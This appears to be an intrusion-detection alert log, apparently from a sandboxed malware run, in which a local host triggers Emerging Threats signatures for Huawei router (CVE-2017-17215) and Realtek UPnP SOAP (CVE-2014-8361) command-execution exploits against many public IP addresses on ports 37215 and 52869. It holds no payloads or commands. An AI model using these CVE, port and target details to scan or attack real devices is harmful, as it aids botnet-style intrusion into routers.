                                      07/20/24-23:01:40.321965TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5325237215192.168.2.23197.122.17.30
                                      07/20/24-23:01:07.036064TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5693437215192.168.2.23141.231.204.102
                                      07/20/24-23:01:00.640312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3595637215192.168.2.2341.48.165.8
                                      07/20/24-23:01:31.977603TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4552837215192.168.2.23157.50.174.241
                                      07/20/24-23:01:41.266946TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4930852869192.168.2.23130.96.13.171
                                      07/20/24-23:01:11.642449TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4118037215192.168.2.2341.255.190.193
                                      07/20/24-23:02:00.651394TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613294452869192.168.2.23186.13.149.1
                                      07/20/24-23:01:04.040812TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5474637215192.168.2.2359.29.162.151
                                      07/20/24-23:01:42.971099TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23869652869192.168.2.23180.231.223.193
                                      07/20/24-23:01:47.783977TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614027852869192.168.2.23206.154.64.238
                                      07/20/24-23:03:46.030378TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614114252869192.168.2.232.183.96.31
                                      07/20/24-23:01:08.588009TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23443652869192.168.2.232.32.130.76
                                      07/20/24-23:01:42.924014TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5708052869192.168.2.2312.110.126.98
                                      07/20/24-23:01:11.633481TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5868237215192.168.2.23124.20.21.168
                                      07/20/24-23:02:04.022244TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614864652869192.168.2.2350.192.76.252
                                      07/20/24-23:01:44.953142TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24673852869192.168.2.23220.31.50.128
                                      07/20/24-23:01:53.484243TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615970652869192.168.2.23112.243.101.70
                                      07/20/24-23:01:07.036064TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3630237215192.168.2.23157.135.212.156
                                      07/20/24-23:01:44.405053TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23380852869192.168.2.23153.201.149.50
                                      07/20/24-23:01:48.036012TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5136252869192.168.2.2388.132.0.162
                                      07/20/24-23:01:41.258057TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5376252869192.168.2.23221.103.3.16
                                      07/20/24-23:01:43.087294TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614183652869192.168.2.23183.141.159.182
                                      07/20/24-23:01:46.495508TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613292652869192.168.2.2344.152.141.175
                                      07/20/24-23:01:12.861753TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M26064852869192.168.2.23183.182.103.28
                                      07/20/24-23:01:20.150638TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6070237215192.168.2.23157.154.200.5
                                      07/20/24-23:01:45.063335TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4525652869192.168.2.2393.44.110.204
                                      07/20/24-23:01:00.640312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3595637215192.168.2.2341.48.165.8
                                      07/20/24-23:01:11.636425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5026437215192.168.2.2341.248.82.51
                                      07/20/24-23:01:49.198416TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24764252869192.168.2.23156.133.161.252
                                      07/20/24-23:01:08.640831TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5555452869192.168.2.23187.26.13.206
                                      07/20/24-23:01:42.509003TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614807852869192.168.2.2388.171.168.15
                                      07/20/24-23:01:41.293630TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3654852869192.168.2.23118.3.222.239
                                      07/20/24-23:02:11.947779TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614532252869192.168.2.2359.213.19.147
                                      07/20/24-23:01:13.299019TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3542652869192.168.2.23191.208.79.121
                                      07/20/24-23:01:40.332650TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3768837215192.168.2.23157.79.18.234
                                      07/20/24-23:02:02.601575TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25728252869192.168.2.2319.154.207.41
                                      07/20/24-23:01:55.273926TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3679252869192.168.2.2318.137.178.82
                                      07/20/24-23:01:08.572556TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24465052869192.168.2.2364.43.73.86
                                      07/20/24-23:01:24.707761TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3354452869192.168.2.2340.226.47.93
                                      07/20/24-23:01:24.790282TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615873652869192.168.2.23108.240.199.7
                                      07/20/24-23:01:02.076414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5071437215192.168.2.23197.150.190.33
                                      07/20/24-23:02:08.171169TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4847852869192.168.2.23151.9.73.188
                                      07/20/24-23:02:00.570605TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614524052869192.168.2.2344.143.79.165
                                      07/20/24-23:01:14.152613TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5072652869192.168.2.231.209.93.74
                                      07/20/24-23:01:45.122550TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4790452869192.168.2.23191.68.229.244
                                      07/20/24-23:01:11.820979TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3536637215192.168.2.23157.25.141.126
                                      07/20/24-23:01:45.179680TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5836052869192.168.2.2350.123.92.219
                                      07/20/24-23:01:00.639011TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4409837215192.168.2.2341.239.125.129
                                      07/20/24-23:01:11.816521TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3314837215192.168.2.23165.8.237.202
                                      07/20/24-23:01:48.576250TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4157652869192.168.2.23203.57.14.26
                                      07/20/24-23:01:34.053062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6098237215192.168.2.2324.36.209.119
                                      07/20/24-23:01:43.890780TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6093652869192.168.2.2351.131.43.210
                                      07/20/24-23:01:42.151857TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3634252869192.168.2.23181.21.97.146
                                      07/20/24-23:01:46.359091TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3541452869192.168.2.2371.66.59.209
                                      07/20/24-23:01:57.500950TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3428052869192.168.2.23145.1.23.220
                                      07/20/24-23:02:04.476708TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614052452869192.168.2.23133.4.55.11
                                      07/20/24-23:01:51.067695TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25073052869192.168.2.23162.125.127.147
                                      07/20/24-23:02:14.686790TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615540052869192.168.2.2314.149.133.62
                                      07/20/24-23:01:21.943544TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5306837215192.168.2.23177.199.180.176
                                      07/20/24-23:01:43.014738TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6057652869192.168.2.23135.97.77.234
                                      07/20/24-23:01:41.991545TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615557052869192.168.2.23191.59.254.237
                                      07/20/24-23:01:04.779951TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613750452869192.168.2.2344.181.179.103
                                      07/20/24-23:01:43.921490TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24777652869192.168.2.23153.197.120.12
                                      07/20/24-23:01:50.807258TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3542252869192.168.2.23180.65.88.44
                                      07/20/24-23:01:08.590754TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25635452869192.168.2.23218.185.172.90
                                      07/20/24-23:01:27.655551TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4870037215192.168.2.23197.225.101.65
                                      07/20/24-23:01:42.653654TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6036452869192.168.2.2385.15.162.89
                                      07/20/24-23:01:20.181938TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3283637215192.168.2.23157.66.141.65
                                      07/20/24-23:01:41.156801TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6057052869192.168.2.2320.143.101.231
                                      07/20/24-23:01:42.751824TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614420852869192.168.2.23106.184.161.191
                                      07/20/24-23:01:43.365017TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615148852869192.168.2.2390.64.10.170
                                      07/20/24-23:01:42.588824TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3777852869192.168.2.2369.23.248.153
                                      07/20/24-23:01:43.197088TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23337252869192.168.2.23135.97.77.234
                                      07/20/24-23:01:02.048367TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3626637215192.168.2.23176.150.171.140
                                      07/20/24-23:01:46.661049TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25862452869192.168.2.23165.29.53.230
                                      07/20/24-23:01:42.809715TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25796452869192.168.2.23218.79.146.2
                                      07/20/24-23:01:52.720668TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24544252869192.168.2.2349.245.141.79
                                      07/20/24-23:01:52.305893TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614032652869192.168.2.23198.12.218.135
                                      07/20/24-23:01:02.059312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4591237215192.168.2.23157.19.254.108
                                      07/20/24-23:01:54.104766TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614456252869192.168.2.2379.6.78.78
                                      07/20/24-23:01:24.745266TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613897852869192.168.2.2367.128.52.113
                                      07/20/24-23:01:40.334452TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3776637215192.168.2.2374.139.190.105
                                      07/20/24-23:01:48.885298TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4937252869192.168.2.23179.176.134.213
                                      07/20/24-23:01:45.660608TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23502652869192.168.2.23130.184.173.22
                                      07/20/24-23:01:40.311124TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5978237215192.168.2.23157.38.204.229
                                      07/20/24-23:01:42.442441TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6025452869192.168.2.2399.233.112.21
                                      07/20/24-23:01:45.540580TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615382252869192.168.2.23156.192.144.142
                                      07/20/24-23:01:47.163877TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4715652869192.168.2.23187.174.160.150
                                      07/20/24-23:01:48.965786TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5806852869192.168.2.2342.135.139.61
                                      07/20/24-23:02:11.703257TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614823852869192.168.2.23202.190.28.250
                                      07/20/24-23:01:31.312311TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24408652869192.168.2.23179.40.74.15
                                      07/20/24-23:01:42.325814TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23514852869192.168.2.23192.18.152.238
                                      07/20/24-23:01:50.949008TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6007852869192.168.2.23107.238.169.17
                                      07/20/24-23:01:40.296076TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4655837215192.168.2.23157.116.51.144
                                      07/20/24-23:01:46.755168TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5264852869192.168.2.23187.223.52.236
                                      07/20/24-23:01:00.639012TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3731037215192.168.2.23157.115.23.92
                                      07/20/24-23:01:31.328066TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24983452869192.168.2.23116.88.149.60
                                      07/20/24-23:01:11.631549TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4919637215192.168.2.23157.16.120.147
                                      07/20/24-23:01:42.571884TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6049852869192.168.2.2318.151.187.19
                                      07/20/24-23:01:02.064358TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4091437215192.168.2.23157.200.107.177
                                      07/20/24-23:01:51.266338TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5985252869192.168.2.23141.3.146.221
                                      07/20/24-23:01:45.511523TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4987852869192.168.2.23113.71.166.108
                                      07/20/24-23:01:42.549328TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25216052869192.168.2.23220.250.27.9
                                      07/20/24-23:01:53.420758TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5985852869192.168.2.2372.136.42.217
                                      07/20/24-23:01:00.651026TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5165837215192.168.2.2343.131.249.62
                                      07/20/24-23:02:09.627181TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4344252869192.168.2.23164.88.135.139
                                      07/20/24-23:01:47.532849TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613299252869192.168.2.23210.32.95.217
                                      07/20/24-23:01:49.877061TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4208452869192.168.2.2314.190.237.146
                                      07/20/24-23:01:02.054387TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4124037215192.168.2.23198.107.98.141
                                      07/20/24-23:01:42.611005TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4248052869192.168.2.2312.129.173.144
                                      07/20/24-23:01:32.027082TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4177237215192.168.2.23212.103.196.38
                                      07/20/24-23:01:42.374543TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4904452869192.168.2.2380.70.75.159
                                      07/20/24-23:01:47.552279TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5173252869192.168.2.2348.81.156.141
                                      07/20/24-23:01:00.633810TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4507237215192.168.2.23157.230.177.125
                                      07/20/24-23:01:04.050503TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5345837215192.168.2.23197.5.29.40
                                      07/20/24-23:01:43.813001TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4539052869192.168.2.23169.195.139.119
                                      07/20/24-23:01:45.519802TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23927852869192.168.2.23173.68.146.233
                                      07/20/24-23:01:41.354322TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4252852869192.168.2.2319.15.33.52
                                      07/20/24-23:02:14.686790TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4043652869192.168.2.23211.214.194.53
                                      07/20/24-23:01:51.963339TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24080452869192.168.2.2367.67.248.34
                                      07/20/24-23:01:48.842529TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613288852869192.168.2.2336.12.14.153
                                      07/20/24-23:00:57.222164TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3447237215192.168.2.2341.90.43.161
                                      07/20/24-23:01:20.161614TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5443237215192.168.2.23157.157.95.90
                                      07/20/24-23:01:42.507489TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3483852869192.168.2.23216.159.45.191
                                      07/20/24-23:01:42.616434TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23294652869192.168.2.23197.25.236.70
                                      07/20/24-23:01:42.673065TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3699452869192.168.2.23158.212.171.84
                                      07/20/24-23:01:31.976795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5310237215192.168.2.23157.170.56.215
                                      07/20/24-23:01:41.974742TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5437852869192.168.2.23212.24.31.41
                                      07/20/24-23:01:49.660516TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25104852869192.168.2.23133.169.65.78
                                      07/20/24-23:01:40.301143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3704837215192.168.2.23149.181.71.228
                                      07/20/24-23:01:08.609855TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6037852869192.168.2.23216.170.33.89
                                      07/20/24-23:01:42.790680TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614056252869192.168.2.23108.54.73.191
                                      07/20/24-23:01:49.120513TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23643252869192.168.2.2343.180.222.83
                                      07/20/24-23:01:34.044152TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4031037215192.168.2.2354.105.148.229
                                      07/20/24-23:01:41.378556TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5671452869192.168.2.2361.42.34.219
                                      07/20/24-23:01:05.141553TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613529652869192.168.2.23133.46.67.74
                                      07/20/24-23:01:46.019511TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613354252869192.168.2.23164.28.92.86
                                      07/20/24-23:02:02.714716TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4362652869192.168.2.2332.132.194.251
                                      07/20/24-23:01:24.444696TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614864452869192.168.2.23114.247.247.18
                                      07/20/24-23:01:43.791502TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5581252869192.168.2.23197.159.127.103
                                      07/20/24-23:01:44.680845TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613779852869192.168.2.2364.111.30.226
                                      07/20/24-23:01:25.383450TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615875052869192.168.2.23186.254.145.51
                                      07/20/24-23:01:27.656128TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4137237215192.168.2.23197.71.44.74
                                      07/20/24-23:01:49.663162TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3347252869192.168.2.2336.71.23.107
                                      07/20/24-23:01:08.650213TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4410252869192.168.2.23115.161.142.144
                                      07/20/24-23:02:00.866395TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4059852869192.168.2.23209.114.160.105
                                      07/20/24-23:01:43.474436TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25435052869192.168.2.23133.125.214.226
                                      07/20/24-23:01:27.723651TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5259437215192.168.2.23157.31.74.199
                                      07/20/24-23:01:31.991336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3589437215192.168.2.23157.50.56.223
                                      07/20/24-23:01:45.660608TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5370252869192.168.2.231.198.183.23
                                      07/20/24-23:01:50.107973TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4540852869192.168.2.23138.90.100.113
                                      07/20/24-23:01:08.565610TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25246052869192.168.2.23106.250.20.58
                                      07/20/24-23:01:20.131339TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4636037215192.168.2.2341.169.34.148
                                      07/20/24-23:01:45.144955TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3327252869192.168.2.23178.242.0.237
                                      07/20/24-23:01:54.562310TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23535052869192.168.2.23108.242.179.170
                                      07/20/24-23:01:01.500174TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5497052869192.168.2.23176.229.44.248
                                      07/20/24-23:01:56.353592TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4921652869192.168.2.23124.34.247.33
                                      07/20/24-23:00:57.221583TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3513837215192.168.2.23197.213.7.238
                                      07/20/24-23:01:31.317774TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25799652869192.168.2.23213.71.93.224
                                      07/20/24-23:01:42.651912TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3373252869192.168.2.23131.104.254.70
                                      07/20/24-23:01:58.143690TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5218852869192.168.2.23149.240.88.161
                                      07/20/24-23:01:07.026812TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4808237215192.168.2.23134.252.78.39
                                      07/20/24-23:01:08.693187TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24618052869192.168.2.2327.181.35.71
                                      07/20/24-23:01:04.049279TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3376237215192.168.2.23210.26.13.127
                                      07/20/24-23:01:04.621319TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614980852869192.168.2.23107.208.110.238
                                      07/20/24-23:01:08.559170TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4564852869192.168.2.23206.208.92.27
                                      07/20/24-23:01:44.368405TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5176252869192.168.2.23197.9.101.249
                                      07/20/24-23:01:44.520226TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5262052869192.168.2.2388.161.89.160
                                      07/20/24-23:01:54.947006TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4840452869192.168.2.23174.110.120.103
                                      07/20/24-23:01:44.533289TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4352852869192.168.2.2337.247.244.116
                                      07/20/24-23:01:48.445925TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24356452869192.168.2.2378.252.101.116
                                      07/20/24-23:01:41.299284TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3940452869192.168.2.23186.129.147.154
                                      07/20/24-23:01:46.407113TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23994652869192.168.2.23150.76.139.116
                                      07/20/24-23:02:02.439009TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615673852869192.168.2.2392.202.152.200
                                      07/20/24-23:01:44.825081TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25807652869192.168.2.2394.208.23.95
                                      07/20/24-23:01:43.023201TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23801852869192.168.2.2349.182.174.70
                                      07/20/24-23:01:06.989167TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4630637215192.168.2.23167.13.180.172
